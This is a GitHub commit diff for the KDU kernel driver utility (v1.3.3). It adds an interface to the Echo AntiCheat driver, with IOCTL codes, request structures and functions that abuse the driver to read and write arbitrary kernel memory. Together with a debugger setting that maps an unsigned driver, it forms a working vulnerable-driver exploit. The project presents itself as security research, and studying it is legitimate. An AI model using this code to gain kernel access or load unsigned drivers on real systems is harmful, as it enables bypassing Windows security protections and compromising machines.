Merge pull request #66 from hfiref0x/dev133

v 1.3.3
hfiref0x · Jul 19, 2023 · 499a630 · 499a630
2 parents a407db2 + 0d880b4
commit 499a630
Show file tree

Hide file tree

Showing 71 changed files with 814 additions and 240 deletions.
diff --git a/KDU.sha256 b/KDU.sha256
diff --git a/README.md b/README.md
@@ -143,6 +143,7 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
 | 36          | Pavel Yosifovich | KExplore  | Kernel Explorer                | Original          | Undefined              |                      |
 | 37          | Pavel Yosifovich | KObjExp  | Kernel Object Explorer          | Original          | Undefined              |                      |
 | 38          | Pavel Yosifovich | KRegExp  | Kernel Registry Explorer        | Original          | Undefined              |                      |
+| 39          | Inspect Element LTD | EchoDrv  | Echo AntiCheat (spyware)     | Original          | Undefined              |                      |
 
 ###### *At commit time, data maybe inaccurate.
 
@@ -207,6 +208,7 @@ Using this program might crash your computer with BSOD. Compiled binary and sour
 * How to exploit a vulnerable windows driver, https://github.com/stong/CVE-2020-15368
 * CVE-2022-3699, https://github.com/alfarom256/CVE-2022-3699
 * LOLDrivers, https://www.loldrivers.io
+* ECHOH NO, https://github.com/kite03/echoac-poc/
 
 # Wormhole drivers code
 

diff --git a/Source/Hamakaze/KDU.vcxproj b/Source/Hamakaze/KDU.vcxproj
@@ -140,6 +140,7 @@
     <ClCompile Include="idrv\dbk.cpp" />
     <ClCompile Include="idrv\dell.cpp" />
     <ClCompile Include="idrv\directio64.cpp" />
+    <ClCompile Include="idrv\echodrv.cpp" />
     <ClCompile Include="idrv\gmer.cpp" />
     <ClCompile Include="idrv\hilscher.cpp" />
     <ClCompile Include="idrv\hp.cpp" />
@@ -193,6 +194,7 @@
     <ClInclude Include="idrv\asrdrv.h" />
     <ClInclude Include="idrv\atszio.h" />
     <ClInclude Include="idrv\dbk.h" />
+    <ClInclude Include="idrv\echodrv.h" />
     <ClInclude Include="idrv\hilscher.h" />
     <ClInclude Include="idrv\hp.h" />
     <ClInclude Include="idrv\ldrsc.h" />

diff --git a/Source/Hamakaze/KDU.vcxproj.filters b/Source/Hamakaze/KDU.vcxproj.filters
@@ -198,6 +198,9 @@
     <ClCompile Include="idrv\zodiacon.cpp">
       <Filter>Source Files\idrv</Filter>
     </ClCompile>
+    <ClCompile Include="idrv\echodrv.cpp">
+      <Filter>Source Files\idrv</Filter>
+    </ClCompile>
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="global.h">
@@ -371,6 +374,9 @@
     <ClInclude Include="idrv\zodiacon.h">
       <Filter>Source Files\idrv</Filter>
     </ClInclude>
+    <ClInclude Include="idrv\echodrv.h">
+      <Filter>Source Files\idrv</Filter>
+    </ClInclude>
   </ItemGroup>
   <ItemGroup>
     <ResourceCompile Include="resource.rc">

diff --git a/Source/Hamakaze/KDU.vcxproj.user b/Source/Hamakaze/KDU.vcxproj.user
@@ -5,7 +5,7 @@
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LocalDebuggerCommandArguments>-list</LocalDebuggerCommandArguments>
+    <LocalDebuggerCommandArguments>-prv 39 -map c:\install\dummy.sys</LocalDebuggerCommandArguments>
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
 </Project>
diff --git a/Source/Hamakaze/diag.cpp b/Source/Hamakaze/diag.cpp
@@ -4,9 +4,9 @@
 *
 *  TITLE:       DIAG.CPP
 *
-*  VERSION:     1.31
+*  VERSION:     1.33
 *
-*  DATE:        09 Apr 2023
+*  DATE:        16 Jul 2023
 *
 *  Hamakaze system diagnostics component.
 *
@@ -649,7 +649,7 @@ VOID KDUBacktraceByHandle(
     UNICODE_STRING usLsass;
 
     union {
-        PSYSTEM_PROCESSES_INFORMATION Processes;
+        PSYSTEM_PROCESS_INFORMATION Process;
         PBYTE ListRef;
     } List;
 
@@ -688,13 +688,13 @@ VOID KDUBacktraceByHandle(
         do {
 
             List.ListRef += nextEntryDelta;
-            if (RtlEqualUnicodeString(&usLsass, &List.Processes->ImageName, TRUE)) {
-                cid.UniqueProcess = List.Processes->UniqueProcessId;
+            if (RtlEqualUnicodeString(&usLsass, &List.Process->ImageName, TRUE)) {
+                cid.UniqueProcess = List.Process->UniqueProcessId;
                 TracePsHandle(&cid, SystemRangeStart, pvModules, FALSE);
                 break;
             }
 
-            nextEntryDelta = List.Processes->NextEntryDelta;
+            nextEntryDelta = List.Process->NextEntryDelta;
 
         } while (nextEntryDelta);
 

diff --git a/Source/Hamakaze/idrv/echodrv.cpp b/Source/Hamakaze/idrv/echodrv.cpp
@@ -0,0 +1,192 @@
+/*******************************************************************************
+*
+*  (C) COPYRIGHT AUTHORS, 2023
+*
+*  TITLE:       ECHODRV.CPP
+*
+*  VERSION:     1.33
+*
+*  DATE:        16 Jul 2023
+*
+*  Inspect Element LTD spyware (anticheat) driver interface.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+//
+// Based on https://github.com/kite03/echoac-poc/tree/main/PoC
+//
+
+#include "global.h"
+#include "idrv/echodrv.h"
+
+HANDLE gEchoDrvClientHandle = NULL;
+
+/*
+* EchoDrvReadWriteVirtualMemory
+*
+* Purpose:
+*
+* Read/Write virtual memory via EchoDrv.
+*
+*/
+BOOL WINAPI EchoDrvReadWriteVirtualMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR VirtualAddress,
+    _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+    _In_ ULONG NumberOfBytes,
+    _In_ BOOL DoWrite
+)
+{
+    ECHODRV_COPYVM_REQUEST request;
+
+    RtlSecureZeroMemory(&request, sizeof(request));
+
+    if (DoWrite) {
+        request.FromAddress = Buffer;
+        request.ToAddress = (PVOID)VirtualAddress;
+    }
+    else {
+        request.FromAddress = (PVOID)VirtualAddress;
+        request.ToAddress = Buffer;
+    }
+
+    request.BufferSize = (SIZE_T)NumberOfBytes;
+    request.ProcessHandle = gEchoDrvClientHandle;
+
+    return supCallDriver(DeviceHandle,
+        IOCTL_ECHODRV_COPYVM,
+        &request,
+        sizeof(request),
+        &request,
+        sizeof(request));
+}
+
+/*
+* EchoDrvWriteVirtualMemory
+*
+* Purpose:
+*
+* Write virtual memory via EchoDrv.
+*
+*/
+BOOL WINAPI EchoDrvWriteVirtualMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR VirtualAddress,
+    _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+    _In_ ULONG NumberOfBytes
+)
+{
+    return EchoDrvReadWriteVirtualMemory(DeviceHandle,
+        VirtualAddress,
+        Buffer,
+        NumberOfBytes,
+        TRUE);
+}
+
+/*
+* EchoDrvReadVirtualMemory
+*
+* Purpose:
+*
+* Read virtual memory via EchoDrv.
+*
+*/
+BOOL WINAPI EchoDrvReadVirtualMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR VirtualAddress,
+    _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+    _In_ ULONG NumberOfBytes
+)
+{
+    return EchoDrvReadWriteVirtualMemory(DeviceHandle,
+        VirtualAddress,
+        Buffer,
+        NumberOfBytes,
+        FALSE);
+}
+
+/*
+* EchoDrvRegisterDriver
+*
+* Purpose:
+*
+* Echo client registration routine.
+*
+*/
+BOOL WINAPI EchoDrvRegisterDriver(
+    _In_ HANDLE DeviceHandle,
+    _In_opt_ PVOID Param)
+{
+    UNREFERENCED_PARAMETER(Param);
+
+    BOOL bResult;
+    ECHODRV_REGISTER regRequest;
+    ECHODRV_VALIDATE_PROCESS procRequest;
+
+    RtlSecureZeroMemory(&regRequest, sizeof(regRequest));
+
+    //
+    // Send empty buffer so this crapware driver will remember client pid to it global variable.
+    // Theorerically this BS driver should do some crypto next-gen calculations but life is
+    // not working as authors expected.
+    //
+
+    bResult = supCallDriver(DeviceHandle,
+        IOCTL_ECHODRV_REGISTER,
+        &regRequest,
+        sizeof(regRequest),
+        &regRequest,
+        sizeof(regRequest));
+
+    if (bResult) {
+
+        //
+        // Only to make MmCopyVirtualMemory work as it expects process object as param. 
+        // 
+        // However we are working with kernel VA and KernelMode processor mode is set by AC.
+        //
+        RtlSecureZeroMemory(&procRequest, sizeof(procRequest));
+
+        procRequest.ProcessId = GetCurrentProcessId();
+        procRequest.DesiredAccess = GENERIC_ALL;
+
+        bResult = supCallDriver(DeviceHandle,
+            IOCTL_ECHODRV_OPEN_PROCESS,
+            &procRequest,
+            sizeof(procRequest),
+            &procRequest,
+            sizeof(procRequest));
+
+        if (bResult)
+            gEchoDrvClientHandle = procRequest.ProcessHandle;
+
+    }
+
+    return bResult;
+}
+
+/*
+* EchoDrvUnregisterDriver
+*
+* Purpose:
+*
+* Echo unregister routine.
+*
+*/
+BOOL WINAPI EchoDrvUnregisterDriver(
+    _In_ HANDLE DeviceHandle,
+    _In_opt_ PVOID Param)
+{
+    UNREFERENCED_PARAMETER(DeviceHandle);
+    UNREFERENCED_PARAMETER(Param);
+
+    if (gEchoDrvClientHandle)
+        NtClose(gEchoDrvClientHandle);
+
+    return TRUE;
+}
diff --git a/Source/Hamakaze/idrv/echodrv.h b/Source/Hamakaze/idrv/echodrv.h
@@ -0,0 +1,86 @@
+/*******************************************************************************
+*
+*  (C) COPYRIGHT AUTHORS, 2022
+*
+*  TITLE:       ECHODRV.H
+*
+*  VERSION:     1.33
+*
+*  DATE:        16 Jul 2023
+*
+*  Inspect Element LTD spyware (anticheat) driver interface header.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+//
+// Echo.ac driver uses a ridiculous IOCTL scheme which could be a side effect of intense copy-paste. 
+//
+
+#define ECHODRV_DEVICE_TYPE         (DWORD)0x9E6A
+#define ECHODRV_INTERFACE_TYPE_1    (DWORD)0xE622
+#define ECHODRV_INTERFACE_TYPE_2    (DWORD)0x60A2
+
+#define ECHODRV_FUNCTION_REGISTER       (DWORD)0x165
+#define ECHODRV_FUNCTION_OPEN_PROCESS   (DWORD)0x92
+#define ECHODRV_FUNCTION_COPYVM         (DWORD)0x849
+
+#define IOCTL_ECHODRV_REGISTER          \
+    CTL_CODE(ECHODRV_DEVICE_TYPE, ECHODRV_FUNCTION_REGISTER, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x9E6A0594
+
+#define IOCTL_ECHODRV_OPEN_PROCESS      \
+    CTL_CODE(ECHODRV_INTERFACE_TYPE_1, ECHODRV_FUNCTION_OPEN_PROCESS, METHOD_BUFFERED, FILE_READ_ACCESS) //0xE6224248
+
+#define IOCTL_ECHODRV_COPYVM            \
+    CTL_CODE(ECHODRV_INTERFACE_TYPE_2, ECHODRV_FUNCTION_COPYVM, METHOD_BUFFERED, FILE_READ_ACCESS) //0x60A26124
+
+typedef struct _ECHODRV_REGISTER {
+    _In_ PUCHAR pvSignature;
+    _In_ SIZE_T cbSignature;
+    _Out_ BOOL bSuccess;
+    _Out_ DWORD UniqCode; //0x1000 for call
+} ECHODRV_REGISTER, * PECHODRV_REGISTER;
+
+typedef struct _ECHODRV_VALIDATE_PROCESS {
+    _In_ DWORD ProcessId;
+    _In_ ACCESS_MASK DesiredAccess;
+    _Out_ HANDLE ProcessHandle;
+    _Out_ BOOL bSuccess;
+    _Out_ DWORD UniqCode; //0x1001 for call
+} ECHODRV_VALIDATE_PROCESS, * PECHODRV_VALIDATE_PROCESS;
+
+typedef struct _ECHODRV_COPYVM_REQUEST {
+    _In_ HANDLE ProcessHandle;
+    _In_ PVOID FromAddress;
+    _In_ PVOID ToAddress;
+    _In_ SIZE_T BufferSize;
+    _Out_ SIZE_T NumberOfBytesCopied;
+    _Out_ BOOL bSuccess;
+    _Out_ DWORD UniqCode; //0x1002 for call
+} ECHODRV_COPYVM_REQUEST, * PECHODRV_COPY_REQUEST;
+
+BOOL WINAPI EchoDrvRegisterDriver(
+    _In_ HANDLE DeviceHandle,
+    _In_opt_ PVOID Param);
+
+BOOL WINAPI EchoDrvUnregisterDriver(
+    _In_ HANDLE DeviceHandle,
+    _In_opt_ PVOID Param);
+
+BOOL WINAPI EchoDrvReadVirtualMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR VirtualAddress,
+    _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+    _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI EchoDrvWriteVirtualMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR VirtualAddress,
+    _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+    _In_ ULONG NumberOfBytes);